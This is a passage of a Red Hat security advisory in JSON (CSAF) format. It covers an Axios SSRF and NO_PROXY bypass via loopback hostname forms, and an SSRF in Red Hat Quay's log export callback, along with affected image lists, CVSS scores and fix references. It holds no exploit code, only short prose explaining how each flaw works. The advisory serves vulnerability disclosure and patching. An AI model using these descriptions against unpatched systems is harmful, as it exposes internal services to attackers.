            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2456913"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, a promise-based HTTP client. This vulnerability occurs because Axios does not correctly handle hostname normalization when evaluating NO_PROXY rules. An attacker can exploit this by crafting requests to loopback addresses (e.g., localhost. or [::1]) which bypass the NO_PROXY configuration and are routed through the configured proxy. This can lead to Server-Side Request Forgery (SSRF) vulnerabilities, enabling attackers to access sensitive internal or loopback services that should otherwise be protected.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: Server-Side Request Forgery and proxy bypass due to improper hostname normalization",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "This flaw has limited impact due to combination of non-default conditions to exploit: the attacker must be able to control or influence URLs passed to axios in a server-side context, the application must have both `HTTP_PROXY` and `NO_PROXY` configured, and the proxy itself must be positioned to act on the misdirected traffic or have been compromised by the attacker to intercept the rerouted traffic.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2025-62718"
        },
        {
          "category": "external",
          "summary": "RHBZ#2456913",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2456913"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2025-62718",
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-62718"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-62718",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62718"
        },
        {
          "category": "external",
          "summary": "https://datatracker.ietf.org/doc/html/rfc1034#section-3.1",
          "url": "https://datatracker.ietf.org/doc/html/rfc1034#section-3.1"
        },
        {
          "category": "external",
          "summary": "https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2",
          "url": "https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df",
          "url": "https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/pull/10661",
          "url": "https://github.com/axios/axios/pull/10661"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/releases/tag/v1.15.0",
          "url": "https://github.com/axios/axios/releases/tag/v1.15.0"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5"
        }
      ],
      "release_date": "2026-04-09T14:31:46.067000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-26T17:12:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11458",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:21017"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 7.0,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Axios: Server-Side Request Forgery and proxy bypass due to improper hostname normalization"
    },
    {
      "acknowledgments": [
        {
          "names": [
            "Antony Di Scala",
            "Michael Whale"
          ]
        }
      ],
      "cve": "CVE-2026-2377",
      "cwe": {
        "id": "CWE-918",
        "name": "Server-Side Request Forgery (SSRF)"
      },
      "discovery_date": "2026-02-11T21:02:44.495000+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2439201"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Red Hat Quay and mirror registry for Red Hat OpenShift. The log export feature in these products allows an authenticated user to specify an arbitrary callback URL. A backend process then makes server-side HTTP requests to this provided URL. This vulnerability, known as Server-Side Request Forgery (SSRF), could allow an attacker to send requests from the application\u0027s internal network, potentially leading to the disclosure of sensitive information.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "mirror-registry: quay: quay: Server-Side Request Forgery via log export functionality",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "Due to the intended and supported use case of Openshift Mirror Registry, deployment in an offline or network-isolated environment, the impact for this product has been downgraded to `Moderate`.\n\nEven in case of compromise, the blast radius is restricted to mirror-registry. It can not be escalated outside the core product. This vulnerability has been scored based on the lack of change of scope.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
